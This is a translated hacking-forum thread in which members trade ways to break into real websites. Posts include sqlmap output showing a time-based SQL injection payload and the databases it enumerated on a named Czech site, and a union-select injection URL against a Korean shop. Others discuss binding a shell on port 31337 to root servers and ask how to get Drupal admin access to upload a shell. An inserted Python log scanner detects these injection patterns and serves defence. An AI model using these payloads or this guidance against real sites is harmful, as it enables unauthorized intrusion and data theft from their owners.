Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by +, 27 Apr 2015.

  1. Waki

    Waki Member

    Why do shells have a "Bind port to /bin/sh [perl]" option, with port 31337 specified?
    How and when is it used? Please explain, if it's not too much trouble.
     
  2. Br@!ns

    Br@!ns Elder - Старейшина

    for back-connect, for rooting the server
     
  3. Waki

    Waki Member

    Where can I read about this in more detail? I don't fully understand how it's done: you click it in the shell, and what comes next is unknown)
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Among the pinned threads in this section there is a thread called "privilege escalation"
     
    _________________________
    Waki likes this.
  5. Roger96

    Roger96 New Member

    Is it possible to dump the database somehow?!

    [​IMG]

    [​IMG]
    or give me a hint on ICQ 660668871
     
    #745 Roger96, 21 Oct 2015
    Last edited: 21 Oct 2015
  6. RedFern.89

    RedFern.89 Member

    it's MySQL time-based there
     
  7. Roger96

    Roger96 New Member

    On the first one or the second? And how do I work it? I mean, dump the database
     
  8. RedFern.89

    RedFern.89 Member

    The first one; it dumps without trouble through sqlmap
     
    Roger96 likes this.
  9. Roger96

    Roger96 New Member

    Really? Is that the one with the js library? And could you tell me the query to dump it? Please
    I wouldn't say it dumps well: http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png
     
    #749 Roger96, 22 Oct 2015
    Last edited: 22 Oct 2015
  10. xivi00

    xivi00 Banned

    What is this parody of sqlmap
     
  11. Roger96

    Roger96 New Member

    I looked and compared: it's the ordinary one
     
  12. R3hab

    R3hab Member

    HTML:
    http://www.elektroline.cz/pdf/pdf_catalogue_item.php?id=3-7615%27
    What can be done?
     
  13. kacergei

    kacergei Member

    sqlmap handles it
    Code:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))mWsI) AND 'FCqd'='FCqd
    ---
    [12:26:48] [INFO] the back-end DBMS is MySQL
    web server operating system: FreeBSD
    web application technology: PHP 5.6.0, Apache 2.4.10
    back-end DBMS: MySQL 5.0.12
    
    Databases:
    available databases [3]:
    [*] elektroline
    [*] information_schema
    [*] test
     
    R3hab likes this.
  14. RWD

    RWD Member

  15. Roger96

    Roger96 New Member

  16. xivi00

    xivi00 Banned

  17. ButilkaSoka

    ButilkaSoka Member

    Code:
    http://www.navistory.kr/shop/m_navi_page.php?ps_pname=page_center&s_chk=3&id=-1/*! and 1=1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()*/+-- 
     
    Га-Ноцри likes this.
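
Added example (not part of the thread and not any poster's code): a check a site operator could run over web access logs to flag the two request shapes quoted above, the `SLEEP()` time-based probe and the `/*! ... union select ... information_schema` form. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Oct/2015:12:26:48 +0000] "GET /item.php?id=3%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20%27x%27=%27x HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/Oct/2015:12:27:02 +0000] "GET /item.php?id=-1/*!%20and%201=1%20union%20select%201,2,group_concat(table_name)+from+information_schema.tables*/+--+ HTTP/1.1" 200 733',
    '198.51.100.7 - - [22/Oct/2015:12:30:15 +0000] "GET /item.php?id=7%2527%2520and%2520sleep%25283%2529 HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Oct/2015:12:31:40 +0000] "GET /search.php?q=sleep+tracker HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

RULES = [
    ("time-delay function", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
]

def normalize(query: str) -> str:
    """Decode and flatten a query string so obfuscated SQL keywords line up."""
    text = query
    for _ in range(2):                                   # covers double URL-encoding
        text = unquote_plus(text)
    text = re.sub(r"/\*!\d*", " ", text)                 # MySQL runs the body of /*! ... */
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)   # ordinary comments used as spacing
    text = text.replace("*/", " ")
    return re.sub(r"\s+", " ", text)

def scan(lines):
    """Return (client, status, [rule names]) for every log line that matches a rule."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = normalize(target.partition("?")[2])
        names = [name for name, rx in RULES if rx.search(query)]
        if names:
            hits.append((client, int(status), names))
    return hits

if __name__ == "__main__":
    for client, status, names in scan(SAMPLE_LOG):
        print(client, status, ", ".join(names))
```

A 200 status on such a request only shows the application answered; whether the parameter is injectable is settled by checking that the query behind it uses bound parameters.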
  18. TopTG

    TopTG New Member

    Guys, give me a hint: there is a site on Drupal 7.34. I have no access with administrator rights, but I do have access as a user. Does this version have any vulnerabilities? How do I get admin access? I want to upload a shell and get access to the files.
     
  19. kacergei

    kacergei Member

     
  20. R3hab

    R3hab Member

    HTML:
    http://musics.bdwebs.tk/listen.php?id=fRh_vgS2dFE*
    Can this error be used somehow?